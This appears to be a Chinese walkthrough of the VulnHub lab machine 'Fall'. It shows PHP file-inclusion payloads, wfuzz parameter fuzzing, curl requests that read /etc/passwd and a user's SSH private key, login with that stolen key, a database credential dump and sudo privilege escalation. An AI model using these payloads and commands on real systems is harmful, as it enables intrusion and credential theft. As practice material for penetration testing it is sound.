【oscp】FALL,wfuzz参数模糊测试

admin 2025年2月9日00:32:41评论3 views字数 3086阅读10分17秒阅读模式
遇见是福气,错过也是

靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-fall,726/

连接好kali,主机发现 & 端口扫描,发现了两个http服务,一个是80端口一个9090端口

【oscp】FALL,wfuzz参数模糊测试
image-20250205215815834

这是80界面

【oscp】FALL,wfuzz参数模糊测试
image-20250205215958348

这是9090界面

【oscp】FALL,wfuzz参数模糊测试
image-20250207203059876

随便点点,文件包含伪协议如下(利用失败)

php://filter/read=convert.base64-encode/resource=index.php
php://filter/resource=index.php
php://filter/string.strip_tags|convert.base64-decode/resource=shell.php

data://text/plain,<?php%20phpinfo();?>
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

file:///etc/passwd

http://127.0.0.1/cmd.php?cmd=php://input
POST数据:<?php phpinfo()?>
【oscp】FALL,wfuzz参数模糊测试
image-20250205220943278

看到网站底部,2.2.15版本

【oscp】FALL,wfuzz参数模糊测试
image-20250205221047827

漏洞检索,但是需要鉴权我们并没有登录后台

【oscp】FALL,wfuzz参数模糊测试
image-20250205221127769

这里看到一个用户发送的一个消息,留着有一个后门

【oscp】FALL,wfuzz参数模糊测试
image-20250205222236135

接下来进行目录扫描,发现有一个test.php

dirsearch -u http://10.10.10.199
【oscp】FALL,wfuzz参数模糊测试
image-20250205222422792

利用wfuzz工具,对参数进行爆破,并筛选出响应长度在100到100000之间的结果

wfuzz -u http://10.10.10.200/test.php?FUZZ=/etc/passwd -w /data/SecLists_Dict/Discovery/Web-Content/small_common.txt
 --ss "^(.{100,100000})$"
【oscp】FALL,wfuzz参数模糊测试
image-20250207193237044

此时发现有一个file参数,访问payload,并发现写那篇文章的qiu用户,

curl http://10.10.10.200/test.php?file=/etc/passwd
【oscp】FALL,wfuzz参数模糊测试
image-20250207203725624

查看是否存在id_rsa,这个文件呢是私匙,在linux中它非常的敏感,如果用户泄露了此文件,那么攻击者就可以利用此文件免密登录服务器,通过下面的命令,可以看到目标服务器泄露了此用户的文件

curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa
【oscp】FALL,wfuzz参数模糊测试
image-20250207203925276

确保私钥文件的权限被严格限制。通常,私钥文件的权限应设置为 600(只有所有者可以读写),否则可能利用不成功。

curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa > qiu
chmod 600 qiu
ssh [email protected] -i qiu
【oscp】FALL,wfuzz参数模糊测试
image-20250207204902250

登录成功后,进行内网信息收集,外网还有一个9090端口的web,那么就来看数据库配置,密码为P@ssw0rdINSANITY

【oscp】FALL,wfuzz参数模糊测试
image-20250207205253315

查看表数据

mysql> select * from cms_users
    -> ;
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
| user_id | username | password                         | admin_access | first_name | last_name | email                | active | create_date         | modified_date       |
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
|       1 | qiu      | bc8b9059c13582d649d3d9e48c16d67f |            1 | qiu qing   | chan      | [email protected]     |      1 | 2021-05-21 17:06:29 | 2021-05-22 02:28:53 |
|       2 | patrick  | 6aea70cc6a678f0f83a82e1c753d7764 |            1 | Patrick    | Ong       | [email protected] |      1 | 2021-05-22 02:28:33 | 2021-05-22 16:54:13 |
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
2 rows in set (0.00 sec)

解密失败

【oscp】FALL,wfuzz参数模糊测试
image-20250207205906279

基本信息收集

uname -a 
hostname # 主机名
# 系统信息相关
lsb_release -a
cat /etc/os-release   
cat /proc/version 
# 权限相关
sudo -l # 查看可以使用sudo的文件
find / -perm -4000 -print 2>/dev/null  # 查找 SUID文件
ls -al /etc/cron* # 查看所有计划任务
find / -perm 777 -type f 2>/dev/null # 查看文件权限为777的文件信息
# 其他信息收集
ps -aux
netstat -tulnp
history 

直到历史命令

【oscp】FALL,wfuzz参数模糊测试
image-20250207210909596

测试sudo,提权成功(之前的mysql服务器密码也可以尝试)

【oscp】FALL,wfuzz参数模糊测试
image-20250207211009998

原文始发于微信公众号(泷羽Sec):【oscp】FALL,wfuzz参数模糊测试

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月9日00:32:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【oscp】FALL,wfuzz参数模糊测试https://cn-sec.com/archives/3717212.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息